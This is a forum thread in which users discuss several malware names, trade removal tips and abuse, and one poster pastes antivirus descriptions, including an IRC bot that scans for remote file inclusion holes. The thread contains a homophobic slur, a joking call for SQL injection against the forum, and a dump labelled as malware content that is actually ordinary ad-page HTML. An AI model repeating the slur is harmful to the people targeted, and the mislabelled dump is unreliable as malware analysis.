VIruses........

[S3th]

Win32.Zafi.B trojian monitors, files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17

Anyone know what these are and how to remove them without any antivirus?

[BerryTheWest]

Do a program vs program.

But I have to know where to get them so I can study their movement and tactic.

Basically Anti-virus does it for you.

[PaRaDoX]

Do a program vs program.

But I have to know where to get them so I can study their movement and tactic.

Basically Anti-virus does it for you.

feh, some like to trick antivirus quarantines, which then tell you its quarantined when it's not. i prefer to use antivirus to tell me where it is, then kill its process and delete it manually. and if a program is calling it (meaning it just restarts when you end it) search it as part of the file content and usually that turns up the pesky file calling it. then you can easily end it using task manager and delete it manually ( since you cant delete it while running ). or you can be lazy and use a batch :3

[BerryTheWest]

Do a program vs program.

But I have to know where to get them so I can study their movement and tactic.

Basically Anti-virus does it for you.

feh, some like to trick antivirus quarantines, which then tell you its quarantined when it's not. i prefer to use antivirus to tell me where it is, then kill its process and delete it manually. and if a program is calling it (meaning it just restarts when you end it) search it as part of the file content and usually that turns up the pesky file calling it. then you can easily end it using task manager and delete it manually ( since you cant delete it while running ). or you can be lazy and use a batch :3

Well sometime it is within Top Level class virus, that you cannot delete it since it is read only after you reset a computer. So they usually do a injection to a DLL or any other files across the system directory and if you delete a file from System directory, your computer is dead.

[a]

hi guys
u need to have a-awar
this prog can clean ur pc from this viruses
and btw watch out from spyware they can harm ur computer

[S3th]

Holy shit. I didn't know. Thanks for that oh so useful information. Faggot. I was researching, not trying to get rid of viruses, I am an ethical Hacker in training, I think I know basic security.

[plope0726]

can we boot this dumb shit?

[S3th]

can we boot this dumb shit?

+1
+2 for the extra lul I got for how you put it XD

[plope0726]

some one should hand over admin powers so this forum could be cleansed...

[S3th]

I asked the site creator if he needed moderators, and I was shocked when I got a reply, but he was stating they don't need any mods. :S.
Anyone able to..ethically.. for the greater good of hacker.org, able to use an sql injection and gain entry?
Just kidding.

[plope0726]

Im sure well figure something out. For we have something he does not, the power of the english language!

[treader]

Win32.Zafi.B trojian monitors, files, networks.
Trojan.Zlob
Spyware.C
Hacktool.D
Dialer.Lox
PackedMassAccess
Spyware.Nod17

Anyone know what these are and how to remove them without any antivirus?

What is Win32.Zafi.B

Win32/Zafi.B is a worm spreading via e-mail and P2P networks.

Zafi.B worm is a moderately destructive worm that may cause antivirus and security products to stop working. It also may overwrite executables of installed security products. Zafi also disables RegEdit, MSconfig and the Task Manager and may also launch a DoS attack against several Hungarian web sites.

You can yourself search your computer manually.

Trojan.Zlob.B is a Trojan horse that opens a back door and allows a remote attacker to perform various actions on the compromised computer.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Distribution
Distribution Level: Low

Spyware.C

sfx.exe content:


<SCRIPT language="javascript" src="http://lads.yousendit.com/mirror/YSImir ... "></SCRIPT>

<center>
<html> <script src="/__utm.js" type="text/javascript"></script> <head> <meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>YouSendIt: The Leader in File Delivery.</title>

<link href="site.css" rel="STYLESHEET" type="text/css">

<script LANGUAGE="JavaScript">
<!-- Begin
image1 = new Image();
image1.src = "images/b_services1.jpg";
image2 = new Image();
image2.src = "images/b_solutions1.jpg";
image3 = new Image();
image3.src = "images/b_support1.jpg";
image4 = new Image();
image4.src = "images/b_company1.jpg";
// End -->
</script>

<script type="text/javascript">
var randnum = Math.random();
var inum = 11;
// Change this number to the number of images you are using.
var rand1 = Math.round(randnum * (inum-1)) + 1;
images = new Array
images[1] = "images/top1.jpg"
images[2] = "images/top2.jpg"
images[3] = "images/top3.jpg"
images[4] = "images/top4.jpg"
images[5] = "images/top5.jpg"
images[6] = "images/top6.jpg"
images[7] = "images/top7.jpg"
images[8] = "images/top8.jpg"
images[9] = "images/top9.jpg"
images[10] = "images/top10.jpg"
images[11] = "images/top11.jpg"
// Ensure you have an array item for every image you are using.
var image = images[rand1]
</script>

</head>


<BODY bgcolor="#ffffff" id="body1" scroll="yes">


<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td rowspan="32" align="top" width="210"><a href="http://www.yousendit.com"><img src="images/ysi_logo_frontpage.jpg" border="0"></a></td>
<td width="518" colspan="2">
<script language="javascript">
<!--
document.write('<img src="'+image+'">')
-->
</script>
</td>
</tr>
<tr>
<td class="smallGrey" align="right">Delivering over 43,973,865,717,760 bytes per day | <strong>What are you sending?</strong></td>
<td><img src="images/dot.gif" width="8" height="8"></td>
</tr>
</table>
</td>
</tr>
<tr><td height="7"></td></tr> <!-- space between "transferring" and blue nav bar -->
</table>
<table cellpadding="0" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr>
<td width="728" height="19" bgcolor="#3366cc" align="right" class="content"><a class="white" href="community.aspx">    YSI Community   </a><a class="white" href="solutions.aspx">|   Business Solutions   </a><a class="white" href="advertise.aspx">|   Advertise    </a></td>
</tr>
<tr>
<td colspan="2" height="3"></td> <!-- space between blue nav bar and content of page -->
</tr>
</table>

<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<iframe src="dart/expired 728x90.aspx" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>


<table cellpadding="0" cellspacing="0" width="728" height="300" bgcolor="#ffffff" border="0">
<tr>
<td class="content" align="left" width="167">
<table width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td width="20"></td>
<td width="*" align="left" valign="top">
<a href="howdoesitwork.aspx" class="currentpage"><br><br><br>
<img src="images/arrow_sm.jpg" border="0">How does it work?</a><br>
<a href="whyyousendit.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Why YouSendIt?</a><br>
<a href="abuse.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Report Abuse</a><br>
<a href="community.aspx" class="currentpage">
<img src="images/arrow_sm.jpg" border="0">Get Involved!</a><br><br>
</td>
<!-- <td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td> -->
</tr>
</table>
</td>
<td class="content" width="561" valign="top"><br>
<table cellpadding="0" cellspacing="0" height="250" border="0">
<tr>
<td width="10" background="images/greenLine10.gif"><img src="images/dot.gif" width="10"></td>
<td width="205" class="content_bigger" valign="top">
<font class="subtitle">Your file has expired.</font><br><br>
Unfortunately, your file has expired. A link is valid
for 7 days or a limited number of downloads, whichever occurs first.<br><br>
Once the link expires, the file is deleted and
cannot be recovered.
</td>
<td width="10"></td>
<td width="336" valign="top">


<center>
<font size="-2">ADVERTISEMENT - Clicking will not affect download.</font><br>
<iframe src="dart/expired 300x250.aspx" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>

</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>

<span class="content"><font size="-2" align="left">A D V E R T I S E M E N T - Clicking this advertisement will not affect download.</font></span><br>
<!-- Begin BidClix Code -->
<script language="javascript" type="text/javascript">
<!--
document.write('<s'+'cript src="http://ads.bidclix.com/code/64469/?cb='+
(new Function
("var d=new Date();var u=Date.UTC(d.getUTCFul"
+"lYear(),d.getUTCMonth(),d.getUTCDay(),d.get"
+"UTCHours(),d.getUTCMinutes(),d.getUTCSecond"
+"s(),d.getUTCMilliseconds());return u+'-'+Ma"
+"th.random();"
))()
+'"><'+'/script>');
// -->
</script>
<noscript>
<iframe src="http://ads.bidclix.com/serve-page/?id=64469" width="740" height="125" scrolling="no" frameBorder="0">
<a href="http://ads.bidclix.com/serve-link/?id=64469" target="_blank"><img src="http://ads.bidclix.com/serve-image/?id=64469" width="740" height="125" border="0" alt="" /></a>
</iframe>
</noscript>
<!-- End BidClix Code -->

<table cellpadding="2" cellspacing="0" width="728" bgcolor="#ffffff" border="0">
<tr align="center">
<td colspan="2" align="center">

<hr noshade color="#CCCCCC" size="1">

</td>
</tr>
<tr height="19">
<td class="smallGreen" align="left"><strong>YouSendIt</strong> &copy 2005</td>
<td width="555" bgcolor="#7FC31C" align="right" class="content">   <a class="white" href="privacy.aspx">Privacy Policy   |  </a> <a class="white" href="tos.aspx">Terms of Service   |  </a> <a class="white" href="dmca.aspx">DMCA Policy</a> <a href="company.aspx" class="white">  |   Company   </a><a href="support.aspx" class="white">|   Support    </a></td>
</tr>
</table>
<!-- BEGIN DART -->
<script language="Javascript">
<!--
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;
//-->
</script>



<SCRIPT LANGUAGE="JavaScript">
document.write('<SCRIPT LANGUAGE="JavaScript1.1" SRC="https://ad.doubleclick.net/adj/expired. ... sect=;ord=' + ord + '?" ><\/SCRIPT>');
</SCRIPT>
<SCRIPT>
if ((!document.images && navigator.userAgent.indexOf("Mozilla/2.") >= 0) || navigator.userAgent.indexOf("WebTV")>= 0) {
document.write('<A HREF="https://ad.doubleclick.net/jump/expired ... sect=;ord=' + ord + '?" TARGET="_blank">');
document.write('<IMG SRC="https://ad.doubleclick.net/ad/expired.y ... sect=;ord=' + ord + '?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>');
}
</SCRIPT>
<NOSCRIPT>
<A HREF="https://ad.doubleclick.net/jump/expired ... =123456789?" TARGET="_blank">
<IMG SRC="https://ad.doubleclick.net/ad/expired.y ... =123456789?" WIDTH="1" HEIGHT="1" BORDER="0" ALT=""></A>
</NOSCRIPT>

<!-- END DART -->



<iframe src="http://a.as-us.falkag.net/dat/dlv/aslfr ... =0&mod=111" width="1" height="1" scrolling="no" frameBorder="0"></iframe>

</body>
</html>


Technical details


This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.Payload


This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.

Depending on the commands received, the bot can:
wipe log files
search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com

If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program ctreats a request which redirects the address to the following link:
http://linknet*****.com/source/cmd.txt?

The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.

The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-


Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).

Dialer.Lox
An updated TrojanHunter ruleset, containing 27639 ruleset entries, is available. This update adds 5 new trojan definitions:

I hope this gave you the answer to your question. And sorry I couldent get information on PackedMassAccess
Spyware.Nod17
Sorry.

[S3th]

Thank you treader. For providing information on those, you're not as bad as I thought